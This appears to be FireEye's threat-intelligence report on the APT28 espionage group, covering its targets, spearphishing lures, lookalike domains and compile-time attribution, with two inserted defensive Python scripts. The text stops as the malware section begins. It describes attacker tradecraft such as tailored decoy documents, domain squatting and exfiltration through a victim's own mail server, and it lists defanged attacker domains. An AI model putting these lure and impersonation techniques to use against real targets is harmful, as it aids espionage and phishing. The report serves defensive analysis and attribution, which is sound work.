                               SPECIAL REPORT




APT28:
A WINDOW INTO RUSSIA’S CYBER
ESPIONAGE OPERATIONS?




APT 28: A Window into Russia’s Cyber Espionage Operations?




CONTENTS

EXECUTIVE SUMMARY  3

APT28 TARGETING REFLECTS RUSSIAN INTERESTS  6
    APT28 Interest in the Caucasus, Particularly Georgia  7
        APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA)  8
        APT28 Targeting of the Georgian Ministry of Defense  9
        APT28 Targeting a Journalist Covering the Caucasus  10
        APT28's Other Targets in the Caucasus  11
    APT28 Targeting of Eastern European Governments and Militaries  12
    APT28 Targeting of NATO and Other European Security Organizations  14
        APT28 Targets European Defense Exhibitions  16
    Other APT28 Targets Are Consistent With Nation State Interests  17

APT28 MALWARE INDICATES SKILLED RUSSIAN DEVELOPERS  19
    Modular Implants Indicate a Formal Development Environment  24
    APT28 Malware Indicates Russian Speakers in a Russian Time Zone  25
        Compile Times Align with Working Hours in Moscow and St. Petersburg  27

CONCLUSION  28

APPENDIX A: DISTINGUISHING THREAT GROUPS  29

APPENDIX B: TIMELINE OF APT28 LURES  30

APPENDIX C: SOURFACE/CORESHELL  31

APPENDIX D: CHOPSTICK  35

APPENDIX E: OLDBAIT  43




2 fireeye.com




EXECUTIVE SUMMARY



Our clients often ask us to assess the threat Russia poses in cyberspace. Russia has long been a whispered frontrunner among capable nations for performing sophisticated network operations. This perception is due in part to the Russian government's alleged involvement in the cyber attacks accompanying its invasion of Georgia in 2008,[1] as well as the rampant speculation that Moscow was behind a major U.S. Department of Defense network compromise, also in 2008.[2] These rumored activities, combined with a dearth of hard evidence, have made Russia into something of a phantom in cyberspace.

In this paper we discuss a threat group whose malware is already fairly well-known in the cybersecurity community. This group, unlike the China-based threat actors we track, does not appear to conduct widespread intellectual property theft for economic gain. Nor have we observed the group steal and profit from financial account information.

The activity that we profile in this paper appears to be the work of a skilled team of developers and operators collecting intelligence on defense and geopolitical issues – intelligence that would only be useful to a government. We believe that this is an advanced persistent threat (APT) group engaged in espionage against political and military targets including the country of Georgia, Eastern European governments and militaries, and European security organizations since at least 2007. They compile malware samples with Russian language settings during working hours consistent with the time zone of Russia's major cities, including Moscow and St. Petersburg.

While we don't have pictures of a building, personas to reveal, or a government agency to name, what we do have is evidence of long-standing, focused operations that indicate a government sponsor – specifically, a government based in Moscow.

We are tracking this group as APT28.

[1] Markoff, John. "Before the Gunfire, Cyberattacks". The New York Times. 12 August 2008. Web. http://www.nytimes.com/2008/08/13/technology/13cyber.html
[2] Knowlton, Brian. "Military Computer Attack Confirmed". The New York Times. 25 August 2010. Web. http://www.nytimes.com/2010/08/26/technology/26cyber.html








KEY FINDINGS

APT28 targets insider information related to governments, militaries, and security organizations that would likely benefit the Russian government.

GEORGIA
APT28 likely seeks to collect intelligence about Georgia's security and political dynamics by targeting officials working for the Ministry of Internal Affairs and the Ministry of Defense.

EASTERN EUROPE
APT28 has demonstrated interest in Eastern European governments and security organizations. These victims would provide the Russian government with an ability to predict policymaker intentions and gauge its ability to influence public opinion.

SECURITY ORGANIZATIONS
APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe.







Since 2007, APT28 has systematically evolved its malware, using flexible and lasting platforms indicative of plans for long-term use. The coding practices evident in the group's malware suggest both a high level of skill and an interest in complicating reverse engineering efforts.

•	Malware compile times suggest that APT28 developers have consistently updated their tools over the last seven years.
•	APT28 malware, in particular the family of modular backdoors that we call CHOPSTICK, indicates a formal code development environment. Such an environment would almost certainly be required to track and define the various modules that can be included in the backdoor at compile time.
•	APT28 tailors implants for specific victim environments. They steal data by configuring their implants to send data out of the network using a victim network's mail server.
•	Several of APT28's malware samples contain counter-analysis capabilities including runtime checks to identify an analysis environment, obfuscated strings unpacked at runtime, and the inclusion of unused machine instructions to slow analysis.

Indicators in APT28's malware suggest that the group consists of Russian speakers operating during business hours in Russia's major cities.

More than half of the malware samples with Portable Executable (PE) resources that we have attributed to APT28 included Russian language settings (as opposed to neutral or English settings), suggesting that a significant portion of APT28 malware was compiled in a Russian language build environment consistently over the course of six years (2007 to 2013).

Over 96% of the malware samples we have attributed to APT28 were compiled between Monday and Friday. More than 89% were compiled between 8AM and 6PM in the UTC+4 time zone, which parallels the working hours in Moscow and St. Petersburg. These samples had compile dates ranging from mid-2007 to September 2014.
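The two measurements behind these findings (compile-time distribution in a chosen time zone, and the language ID of PE resources) are easy to reproduce over one's own sample set. The following is an added example written for this edit, not code from the report or from FireEye: it reads the COFF TimeDateStamp out of a PE header, buckets each sample by weekday and local hour in UTC+4, and classifies the resource language ID. The sample set, the minimal PE header builder and the UTC+4 offset are all constructed assumptions; the language ID constants are the standard Windows primary language IDs.

```python
"""Compile-time and build-language profiling of PE samples (added example)."""
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

# Windows primary language IDs (low 10 bits of a LANGID): neutral, English, Russian.
LANG_NEUTRAL, LANG_ENGLISH, LANG_RUSSIAN = 0x00, 0x09, 0x19


def pe_compile_timestamp(data: bytes) -> int:
    """Return the COFF TimeDateStamp (seconds since the Unix epoch, UTC) of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)        # offset of the PE header
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # COFF header layout: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp


def language_class(lang_id: int) -> str:
    """Map a resource LANGID to the three classes the report distinguishes."""
    primary = lang_id & 0x3FF
    return {LANG_NEUTRAL: "neutral", LANG_ENGLISH: "english",
            LANG_RUSSIAN: "russian"}.get(primary, "other")


def profile(samples, utc_offset_hours=4, start_hour=8, end_hour=18):
    """samples: iterable of (TimeDateStamp, resource LANGID) pairs.

    Returns the share compiled Monday-Friday, the share compiled inside
    [start_hour, end_hour) local time in the given UTC offset, and language counts.
    """
    tz = timezone(timedelta(hours=utc_offset_hours))
    samples = list(samples)
    weekdays = in_hours = 0
    languages = Counter()
    for stamp, lang_id in samples:
        local = datetime.fromtimestamp(stamp, tz=tz)
        if local.weekday() < 5:                      # Monday == 0 ... Friday == 4
            weekdays += 1
        if start_hour <= local.hour < end_hour:
            in_hours += 1
        languages[language_class(lang_id)] += 1
    n = len(samples)
    return {"count": n, "weekday_share": weekdays / n,
            "working_hours_share": in_hours / n, "languages": dict(languages)}


# --- constructed test data (assumption: not real APT28 samples) -----------------
def _local(y, m, d, h, mi):
    """Epoch seconds for a wall-clock time in UTC+4."""
    return int(datetime(y, m, d, h, mi, tzinfo=timezone(timedelta(hours=4))).timestamp())

SAMPLES = [
    (_local(2013, 5, 13, 9, 15), 0x0419),   # Monday, Russian resources
    (_local(2013, 5, 13, 16, 40), 0x0419),
    (_local(2013, 5, 14, 11, 5), 0x0409),   # Tuesday, English (US)
    (_local(2013, 5, 15, 14, 0), 0x0419),
    (_local(2013, 5, 15, 17, 55), 0x0000),  # neutral
    (_local(2013, 5, 16, 10, 20), 0x0419),
    (_local(2013, 5, 17, 12, 45), 0x0419),  # Friday
    (_local(2013, 5, 17, 15, 10), 0x0409),
    (_local(2013, 5, 16, 22, 30), 0x0419),  # Thursday night: outside working hours
    (_local(2013, 5, 18, 11, 0), 0x0000),   # Saturday: weekend
]


def minimal_pe(stamp: int) -> bytes:
    """Constructed 64-byte DOS header + PE signature + COFF header, enough for pe_compile_timestamp()."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)          # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, 1, stamp, 0, 0, 0, 0x102)
    return dos + b"PE\0\0" + coff


if __name__ == "__main__":
    print(pe_compile_timestamp(minimal_pe(SAMPLES[0][0])) == SAMPLES[0][0])
    print(profile(SAMPLES))
```

The UTC offset is a parameter rather than a constant because the same histogram run at UTC+8 or UTC-5 is how an analyst checks that the working-hours pattern is distinctive and not an artifact of the chosen zone; likewise, timestamps that are zero or far in the future should be excluded upstream, since they are easily forged.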











APT28 TARGETING REFLECTS RUSSIAN INTERESTS

APT 28: Three Themes
•	The Caucasus, particularly the country of Georgia
•	Eastern European governments and militaries
•	The North Atlantic Treaty Organization (NATO) and other European security organizations

Many of APT28's targets align generally with interests that are typical of any government. However, three themes in APT28's targeting clearly reflect areas of specific interest to an Eastern European government, most likely the Russian government. These include the Caucasus (especially the Georgian government), Eastern European governments and militaries, and specific security organizations.

APT28 uses spearphishing emails to target its victims, a common tactic in which the threat group crafts its emails to mention specific topics (lures) relevant to recipients. This increases the likelihood that recipients will believe that the email is legitimate and will be interested in opening the message, opening any attached files, or clicking on a link in the body of the email. Since spearphishing lures are tailored to the recipients whose accounts APT28 hopes to breach, the subjects of the lures provide clues as to APT28's targets and interests. For example, if the group's lures repeatedly refer to the Caucasus, then this most likely indicates that APT28 is trying to gain access to the accounts of individuals whose work pertains to the Caucasus. Similarly, APT28's practice of registering domains that mimic those of legitimate news, politics, or other websites indicates topics that are relevant to APT28's targets.

We identified three themes in APT28's lures and registered domains, which together are particularly relevant to the Russian government.

In addition to these themes, we have seen APT28 target a range of political and military organizations. We assess that the work of these organizations serves nation state governments.





APT28 INTEREST IN THE CAUCASUS, PARTICULARLY GEORGIA

[Map of the Caucasus region: Russia (Chechnya; Kavkaz Center), Abkhazia, Georgia (Tbilisi), Armenia (Yerevan; Armenian Military), Azerbaijan, Turkey]

The Caucasus, a region that includes Chechnya and other Russian republics and the independent states of Georgia, Armenia, and Azerbaijan, continues to experience political unrest. The Georgian government's posture and ties to the West are a frequent source of Moscow's frustration, particularly after the 2008 war. Overall, issues in the Caucasus likely serve as focal points for Russian intelligence collection efforts.

Since 2011, APT28 has used lures written in Georgian that are probably intended to target Georgian government agencies or citizens. APT28 is likely seeking information on Georgia's security and diplomatic postures. Specifically, the group has targeted the Georgian Ministry of Internal Affairs (MIA) and the Ministry of Defense (MOD). We also observed efforts to target a journalist working on issues in the Caucasus and a controversial Chechen news site.









APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA)

The MIA harbors sensitive information about the inner workings of Georgia's security operations, the country's engagement in multilateral institutions, and the government's communications backbone. It is responsible for:[3]

•	Policing, internal security, and border patrols
•	Counterintelligence
•	Counterterrorism
•	International relations
•	Defense of Georgia's strategic facilities and assets
•	"Operative-Technical" tasks

APT28 made at least two specific attempts to target the MIA. In one case, we identified an APT28 lure from mid-2013 that referenced MIA-related topics and employed malware that attempted to disguise its activity as legitimate MIA email traffic. The lure consisted of a weaponized Excel file that presented a decoy document containing a list of Georgian driver's license numbers. The backdoor attempted to establish a connection to a Georgian MIA mail server and communicate via MIA email addresses ending with "@mia.ge.gov". Once connected to the mail server, APT28's backdoor sent an email message using a subject line related to driver's licenses (in Georgian), and attached a file containing system reconnaissance information. This tactic could allow APT28 to obtain data from the MIA's network through a less-monitored route, limiting the MIA network security department's abilities to detect the traffic.

In the second example of MIA targeting, an APT28 lure used an information technology-themed decoy document that included references to the Windows domain "MIA Users\Ortachala…" (Figure 1). This probably referred to the MIA facility in the Ortachala district of Tbilisi, Georgia's capital city. The decoy document also contains metadata listing "MIA" as the company name and "Beka Nozadze"[4] as an author, a possible reference to a system administrator in Tbilisi. The text of the document purports to provide domain and user group setup information for internal Windows XP and Windows 7 systems. APT28 possibly crafted this document to appear legitimate to all MIA system users and intended to breach the MIA network specifically using the embedded malware.

APT28 Targeting of the Georgian Ministry of Defense

APT28 also appeared to target Georgia's MOD along with a U.S. defense contractor that was training the Georgian military. APT28 used a lure document that installed a SOURFACE downloader (further discussed in the Malware section) and contained a listing of birthdays for members of a working group between the Georgian MOD and the U.S. defense contractor. The U.S. contractor was involved in a working group to advise the MOD and Georgian Armed Forces, assess Georgia's military capabilities, and develop a military training program for the country.

[3] Georgian Ministry of Internal Affairs website http://police.ge/en/home
[4] Queries on the author yielded a LinkedIn page for a person of the same name who serves as a system administrator in Tbilisi.




   Figure 1: Georgian MIA-related decoy








We believe that APT28's targeting of the MOD aligns with Russian threat perceptions. The growing U.S.-Georgian military relationship has been a source of angst for Russia. Georgia and Russia severed diplomatic relations following the Russia-Georgia War in 2008, and Georgia has since sought to align itself more closely with western security organizations. Additionally, in June 2014, despite Russia's vocal objections, Georgia, along with Ukraine and Moldova, signed association accords with the EU.[5] This move placed all three countries more firmly in the EU's political, economic, and security spheres of influence. Georgian military security issues, particularly with regard to U.S. cooperation and NATO, provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics.

APT28 Targeting a Journalist Covering the Caucasus

Another one of APT28's lures appeared to target a specific journalist covering issues in the Caucasus region. In late 2013, APT28 used a lure that contained a letter addressing a journalist by his first name and claiming to originate from a "Chief Coordinator" in Reason Magazine's "Caucasian Issues Department" – a division that does not appear to exist.[6] (Reason Magazine is a US-based magazine.) The letter welcomed the individual as a contributor and requested topic ideas and identification information in order to establish him at the magazine. In the background, the decoy document installed a SOURFACE backdoor on the victim's system.

Figure 2: Excerpt of APT28's letter to a journalist writing on Caucasus-related issues

    We wish our cooperation will be both profitable and trusted. Our aim in the Caucasian region is
    to help people who struggle for their independence, liberty and human rights. We all know, that
    world is often unfair and cruel, but all together we can make it better.
    Send your articles on this email – in Russian or English, please. There are some difficulties with
    Caucasian languages, but we'll solve the problem pretty soon, I hope.

[5] "The EU's Association Agreements with Georgia, the Republic of Moldova and Ukraine". European Union Press Release Database. 23 June 2014. Web. http://europa.eu/rapid/press-release_MEMO-14-430_en.htm
[6] We attempted to identify candidate journalists in the country. One of these was a Georgian national of Chechen descent, whose work appears to center on Chechen and human rights issues. Ultimately, however, we cannot confirm the identity of the target(s).








 Table 1: Examples of APT28 domains imitating organizations in the Caucasus




 APT28 Domain               Real Domain

                            The Kavkaz Center / The Caucasus Center, an international Islamic news agency with coverage of
 kavkazcentr[.]info
                            Islamic issues, particularly Russia and Chechnya (kavkazcenter.com)
 rnil[.]am                  Armenian military (mil.am)




                             The body of the letter suggests that APT28 actors                                APT28’s Other Targets in the Caucasus
                             are able to read at least two languages – Russian                                We have seen APT28 register at least two
                             and English. The grammar of the letter also                                      domains mimicking the domains of legitimate
indicates that English is not the author’s first language, despite it purportedly originating from a US-based magazine. This implies that Russian may be the APT28 author’s preferred language.

Targeting journalists could provide APT28 and its sponsors with a way to monitor public opinion, identify dissidents, spread disinformation, or facilitate further targeting. Several other nation states are suspected of targeting journalists and dissidents to monitor their activity, including China and Iran.7,8 Journalists in the Caucasus working on Caucasus independence issues would be a prime target for intelligence collection for Moscow. Journalists critical of the Kremlin have long been targets of surveillance and harassment, and a number of governments and human rights organizations have publicly criticized the government for its treatment of journalists and its increasing consolidation of control over the media.9

organizations in the Caucasus, as shown in the table below. One APT28 domain imitated a key Chechen-focused news website, while the other appeared to target members of the Armenian military by hosting a fake login page.

Of particular note, the Kavkaz Center is a Chechen-run website designed to present an alternative view of the long-running conflict between Russia and Chechen separatists. In 2004 and 2013,10,11 Russia’s Foreign Minister voiced his displeasure that a Swedish company continues to host the Kavkaz Center website.




7  Moran, Ned, Villeneuve, Nart, Haq, Thofique, and Scott, Mike. “Operation Saffron Rose”. FireEye. 13 May 2014. Web. http://www.fireeye.com/blog/technical/malware-research/2014/05/operation-saffron-rose.html
8  The New York Times publicly disclosed their breach by APT12, which they assess was motivated by the China-based actors’ need to know what the newspaper was publishing about a controversial topic related to corruption and the Chinese Communist Party’s leadership.
9  “Russia”. Freedom House Press Release. 2013. Web. http://www.freedomhouse.org/report/freedom-press/2013/russia#.VD8fe9R4rew
10 “Chechen website promotes terror: Lavrov”. UPI. 16 November 2004. Web. http://www.upi.com/Top_News/2004/11/16/Chechen-website-promotes-terror-Lavrov/UPI-11601100627922/
11 “Lavrov urges Sweden to ban Chechen website server”. The Voice of Russia. 15 May 2013. Web. http://voiceofrussia.com/news/2013_05_15/Lavrov-urges-Sweden-to-ban-Chechen-website-server/







APT28 TARGETING OF EASTERN EUROPEAN GOVERNMENTS AND MILITARIES




Figure 3: Decoy MH17 document probably sent to the Polish government

Eastern European countries’ political and military postures are traditionally core Russian government interests. The Kremlin has long regarded the former Soviet Republics and satellite states as in its sphere of economic, political, and military interest. Over the past two decades, as many of these states joined NATO and the EU, Russia has attempted to regain its influence in the region. Many of APT28’s targets parallel this continued focus on Eastern European governments and militaries.

                                                                                                            APT28 Targets Eastern European
                                                                                                            Government Organizations
                                                                                                            We have evidence that APT28 made at least two
                                                                                                            attempts to compromise Eastern European
                                                                                                            government organizations:

                                                                                                            •	    In a late 2013 incident, a FireEye device
                                                                                                                  deployed at an Eastern European Ministry of
                                                                                                                  Foreign Affairs detected APT28 malware in
                                                                                                                  the client’s network.
                                                                                                            •	    More recently, in August 2014 APT28 used a
                                                                                                                  lure (Figure 3) about hostilities surrounding a
                                                                                                                  Malaysia Airlines flight downed in Ukraine in
                                                                                                                  a probable attempt to compromise the Polish
                                                                                                                  government. A SOURFACE sample employed
                                                                                                                  in the same Malaysia Airlines lure was
                                                                                                                  referenced by a Polish computer security
                                                                                                                  company in a blog post.12 The Polish security
                                                                                                                  company indicated that the sample was “sent
                                                                                                                  to the government,” presumably the Polish
                                                                                                                  government, given the company’s location
                                                                                                                  and visibility.

12 “MHT, MS12-27 Oraz *malware*.info”. Malware@Prevenity. 11 August 2014. Web. http://malware.prevenity.com/2014/08/malware-info.html






 Table 2: Examples of APT28 domains imitating legitimate Eastern European organization names




 APT28 Domain                                                   Real Domain

 standartnevvs[.]com                                            Bulgarian Standart News website (standartnews.com)

 novinitie[.]com, n0vinite[.]com                                Bulgarian Sofia News Agency website (novinite.com)

 qov[.]hu[.]com                                                 Hungarian government domain (gov.hu)

 q0v[.]pl, mail[.]q0v[.]pl                                      Polish government domain (gov.pl) and mail server domain (mail.gov.pl)

 poczta.mon[.]q0v[.]pl                                          Polish Ministry of Defense mail server domain (poczta.mon.gov.pl)





APT28 has registered domains similar to those of legitimate Eastern European news sites and governments, listed in Table 2. These domain registrations not only suggest that APT28 is interested in Eastern European political affairs, but also that the group targets Eastern European governments directly.

In addition, APT28 used one domain for command and control sessions (baltichost[.]org) that was themed after the Baltic Host exercises. Baltic Host is a multinational logistics planning exercise, hosted annually since 2009 by one of the three Baltic States (Estonia, Latvia, and Lithuania, all three of which are on Russia’s border) on a rotational basis. In June 2014, this event was integrated with a larger U.S. Army training event, and focused on exercises to improve interoperability with regional allies and partners.13,14

This domain registration suggests that APT28 sought to target individuals either participating in the exercises or interested in Baltic military and security matters. Such targets would potentially provide APT28 with sensitive tactical and strategic intelligence concerning regional military capabilities and relationships. These exercises are a particular point of interest in Moscow: pro-Kremlin press cited Russia’s interpretation of these military exercises and NATO’s involvement as a “sign of aggression,” and Russia’s Foreign Minister publicly stated that the exercise was “a demonstration of hostile intention.”15


13 “Saber Strike and Baltic Host kick off in Latvia, Lithuania and Estonia”. Estonian Defense Forces. 9 June 2014. Web. 11 June 2014. http://www.mil.ee/en/news/8251/saber-strike-and-baltic-host-kick-off-in-latvia,-lithuania-and-estonia
14 “Baltic Host 2014 rendering host nation support for the training audience of Exercise Saber Strike 2014 and repelling faked cyber-attacks”. Republic of Lithuania Ministry of National Defense. 12 June 2014. Web. http://www.kam.lt/en/news_1098/current_issues/baltic_host_2014_rendering_host_nation_support_for_the_training_audience_of_exercise_saber_strike_2014_and_repelling_faked_cyber-attacks.html
15 “Tanks, troops, jets: NATO countries launch full-scale war games in Baltic”. Russia Today. 9 June 2014. Web. http://rt.com/news/164772-saber-strike-exercise-nato/







APT28 TARGETING OF NATO AND OTHER EUROPEAN SECURITY ORGANIZATIONS




APT28’s lures and domain registrations also demonstrate their interest in NATO and other European security organizations. NATO remains a chief Russian adversary, or in the words of Russia’s 2010 military doctrine, a “main external military danger”, particularly as it moves “closer to the borders of the Russian Federation.”16 NATO was the traditional western counterweight to the Soviet Union, and Russia regards NATO, particularly NATO’s eastward expansion, as a threat to Russia’s strategic stability. APT28 also registered a domain name imitating the Organization for Security and Cooperation in Europe (OSCE), an intergovernmental organization that has cited widespread fraud in numerous Russian state elections. Insider information about NATO, the OSCE and other security organizations would inform Russian political and military policy.

Several of the domains APT28 registered imitated NATO domain names, including those of NATO Special Operations Headquarters and the NATO Future Forces Exhibition. We also observed a user that we suspect works for NATO HQ submit an APT28 sample to VirusTotal, probably as a result of receiving a suspicious email.




                              Table 3: Examples of APT28 domains imitating legitimate NATO and security websites



                              APT28 Domain                                   Real Domain

                              nato.nshq[.]in                                 NATO Special Operations Headquarters (nshq.nato.int)
                              natoexhibitionff14[.]com                       NATO Future Forces 2014 Exhibition & Conference (natoexhibition.org)
                              login-osce[.]org                               Organization for Security and Cooperation in Europe (osce.org)
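The domains in Tables 2 and 3 show the imitation techniques a domain watchlist has to catch: confusable characters (vv for w, 0 for o, q for g), a one-character typo (novinitie), the real domain reused as subdomain labels under an attacker-controlled registration (qov[.]hu[.]com), the target’s labels reordered under another suffix (nato.nshq[.]in), a brand joined to a lure word with a hyphen (login-osce[.]org), and a brand embedded in a longer label (natoexhibitionff14[.]com). The following Python script is an added example written for this page, not code from the FireEye report, that triages a candidate domain against the legitimate domains the tables name. The confusable mapping for rn/m, the tiny stand-in for the Public Suffix List, and the sample input list are assumptions constructed for the example.

```python
"""Triage lookalike domains of the kinds listed in Tables 2 and 3."""
from typing import NamedTuple

# Substitutions seen in the APT28 domains on this page: "vv" for "w",
# "0" for "o", "q" for "g". "rn" for "m" is added as an assumption.
# Digraphs go first so they fold before single characters.
CONFUSABLES = [("vv", "w"), ("rn", "m"), ("0", "o"), ("q", "g")]

# Stand-in for the Public Suffix List, limited to suffixes in the tables
# (assumption; a real deployment loads the full list).
PUBLIC_SUFFIXES = {"com", "org", "pl", "hu", "in", "int", "uk", "co.uk"}

# The legitimate domains the tables say were imitated.
PROTECTED = ["standartnews.com", "novinite.com", "gov.hu", "gov.pl",
             "nshq.nato.int", "natoexhibition.org", "osce.org"]


class Match(NamedTuple):
    candidate: str
    target: str
    reason: str


def refang(domain: str) -> str:
    """'a[.]b' -> 'a.b', lowercased, no trailing dot."""
    return domain.strip().lower().replace("[.]", ".").rstrip(".")


def skeleton(label: str) -> str:
    """Fold confusable spellings so q0v and gov compare equal."""
    for bad, good in CONFUSABLES:
        label = label.replace(bad, good)
    return label


def suffix_len(labels: list) -> int:
    """Number of trailing labels that form the public suffix."""
    for n in (2, 1):
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return n
    return 1


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, for single-typo squats like novinitie."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1,
                           prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_lookalikes(candidate: str, protected=PROTECTED) -> list:
    """Return one Match per protected domain the candidate imitates."""
    cand = refang(candidate)
    c_labels = [skeleton(x) for x in cand.split(".")]
    c_n = suffix_len(c_labels)
    c_reg = ".".join(c_labels[-(c_n + 1):])   # registrable domain
    c_brand = c_labels[:-c_n]                  # every label above the suffix
    hits = []
    for p in protected:
        p = refang(p)
        if cand == p or cand.endswith("." + p):
            continue                # the real domain or one of its real hosts
        p_labels = [skeleton(x) for x in p.split(".")]
        p_n = suffix_len(p_labels)
        p_reg = ".".join(p_labels[-(p_n + 1):])
        p_brand = p_labels[:-p_n]
        single = p_brand[0] if len(p_brand) == 1 else None
        if c_reg == p_reg:
            reason = "registrable domain matches after confusable folding"
        elif (single and len(single) >= 6 and c_brand
              and edit_distance(c_brand[-1], single) == 1):
            reason = "registrable label is one edit away from the target"
        elif f".{p_reg}." in "." + ".".join(c_labels) + ".":
            reason = "target domain reused as subdomain labels"
        elif len(p_brand) >= 2 and set(c_brand) == set(p_brand):
            reason = "target labels reordered under another suffix"
        elif single and any("-" in x and single in x.split("-") for x in c_brand):
            reason = "target brand as a hyphen-separated token"
        elif single and len(single) >= 8 and any(single in x for x in c_brand):
            reason = "target brand embedded in a longer label"
        else:
            continue
        hits.append(Match(cand, p, reason))
    return hits


# Constructed input: the APT28 domains from Tables 2 and 3, plus one
# legitimate Polish government host as a control that must not fire.
SAMPLE = ["standartnevvs[.]com", "novinitie[.]com", "n0vinite[.]com",
          "qov[.]hu[.]com", "q0v[.]pl", "mail[.]q0v[.]pl",
          "poczta.mon[.]q0v[.]pl", "nato.nshq[.]in",
          "natoexhibitionff14[.]com", "login-osce[.]org", "mail.gov.pl"]

if __name__ == "__main__":
    for d in SAMPLE:
        for m in find_lookalikes(d):
            print(f"{m.candidate:28} -> {m.target:20} {m.reason}")
```

Each of the ten APT28 domains produces exactly one match with the table’s real domain, and the legitimate host mail.gov.pl produces none, because a candidate that is the protected domain itself or a real subdomain of it is skipped before any check runs. The checks are ordered from strongest to weakest signal so that one domain is reported once, with the most specific reason; the skeleton folding is deliberately lossy (it maps nshq and nshg to the same string, for example), so the output is a triage queue for an analyst or a feed for DNS and mail-gateway blocking, not a verdict on its own.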



                             16
                                  The Military Doctrine of the Russian Federation, approved by Presidential edict on 5 February 2010.








APT28 also demonstrated an interest in defense attachés working in European countries. We identified an APT28 lure containing a decoy document with a list of British officers and U.S. and Canadian military attachés in London.




Figure 4: Decoy document used against military attachés in 2012




                                                             Finally, APT28 used a lure that contained an apparent
                                                             non-public listing of contact information for defense
                                                             attachés in the “Ankara Military Attaché Corps (AMAC),”
                                                             which appears to be a professional organization of
                                                             defense attachés in Turkey.




Figure 5: Ankara Military Attaché Corps decoy document








APT28 Targets European Defense Exhibitions
In addition to targeting European security organizations and governments, it appears that APT28 is targeting attendees of European defense exhibitions. Some of the APT28-registered domains imitated those of defense events held in Europe, such as the Farnborough Airshow 2014, EuroNaval 2014, EUROSATORY 2014, and the Counter Terror Expo. In September 2014, APT28 registered a domain (smigroup-online.co[.]uk) that appeared to mimic that for the SMi Group, a company that plans events for the “Defence, Security, Energy, Utilities, Finance and Pharmaceutical sectors.” Among other events, the SMi Group is currently planning a military satellite communications event for November 2014.

Targeting organizations and professionals involved in these defense events would likely provide APT28 with an opportunity to procure intelligence pertaining to new defense technologies, as well as the victim organizations’ operations, communications, and future plans.











OTHER APT28 TARGETS ARE CONSISTENT WITH NATION STATE INTERESTS




APT28 has targeted a variety of organizations that fall outside of the three themes we highlighted above. However, we are not profiling all of APT28’s targets with the same detail because they are not particularly indicative of a specific sponsor’s interests. They do indicate parallel areas of interest to many governments and do not run counter to Russian state interests.

Other probable APT28 targets that we have identified:

•	Norwegian Army (Forsvaret)
•	Government of Mexico
•	Chilean Military
•	Pakistani Navy
•	U.S. Defense Contractors
•	European Embassy in Iraq
•	Special Operations Forces Exhibition (SOFEX) in Jordan
•	Defense Attachés in East Asia
•	Asia-Pacific Economic Cooperation (APEC)
•	Al-Wayi News Site

[Legend of the accompanying graphic of probable APT28 targets]
INTERNATIONAL ORGANIZATION: European Commission; UN Office for the Coordination of Humanitarian Affairs; APEC; NATO; OSCE; World Bank
OTHER: Hizb ut-Tahrir; Chechnya Global; Diplomatic Forum; Military Trade Shows
KEY: APT28 Registered Domains; Lure Document; Phishing Email








[Graphic: word map of probable APT28 targets. Labels legible in the extraction include US defense attachés and US defense contractors, Canadian defense attachés, Mexican government, UK defense attachés, Hungarian government, Norwegian military, Polish government, Georgian government, Croatian (entity truncated), and defense attachés in Japan, South Korea and China; the remaining labels are not recoverable.]




                                                                                                                                                                                                             AQ
                                                                                                                                                         AF




                                                                                                                                                                                        AC
                                                                                                                                                                   PA
                                                 Y




                                                                                                                                     BUL
                                                                                     O (MFA)
                                               AR




                                                                                                                                                   NS




                                                                                                                                                                                          AD
                                                                                                                                                          GH


                                                                                                                                                                      K AS
                                             IT




                                                                                                                                                                                              EM
                                                                                                                                                   EA
                                                                                                                                        GAR




                                                                                                                                                             AN
                                            IL




                                                                                                                                                                          TA




                                                                                                                                                                                                   IC
                                           M




                                                                                                                                                     TTA


                                                                                                                                                                 IN



                                                                                                                                                                             N




                                                                                                                                                                                                      S
                                       AN




                                                                                                                                                                                IM
                                                                                                                                          IAN
                                                                               ICAN DIRC




                                                                                                                                                                  EW
                                                                                                                                                        CH
                                     LE




                                                                                                                                                                                  IL
                                                                                                                                                                                        IT
                                                                                                                                                                    S
                                       I




                                                                                                                                            NEW
                                    CH




                                                                                                                                                         ES




                                                                                                                                                                                          AR
                                                                                                                                                                      W




                                                                                                                                                                                            Y
                                                                                                                                                                        EB
                                                                                                                                                           IN
                                                                                                                        UGANDA




                                                                                                                                              SW




                                                                                                                                                                          SI
                                                                                                                                                             TU



                                                                                                                                                                           TE
                                                                             SOUTH AFR




                                                                                                                                                                 RK
                                                                                                                                                   EBS



                                                                                                                                                                 EY
                                                                                                                                                   ITES
                                                                                                                             N NGO




 KEY
 APT28 Registered Domains

 Lure Document
 Phishing Email









APT28 MALWARE INDICATES SKILLED RUSSIAN DEVELOPERS

APT28’s tools are suggestive of the group’s skills, ambitions, and identity. Our analysis of some of the group’s more commonly used tools indicates that APT28 has been systematically updating their tools since 2007. APT28 is most likely supported by a group of developers creating tools intended for long-term use and versatility, who make an effort to obfuscate their activity. This suggests that APT28 receives direct ongoing financial and other resources from a well-established organization, most likely a nation state government. APT28’s malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours, which suggests that the Russian government is APT28’s sponsor.

Some of APT28’s more commonly used tools are the SOURFACE downloader, its second stage backdoor EVILTOSS, and a modular family of implants that we call CHOPSTICK.

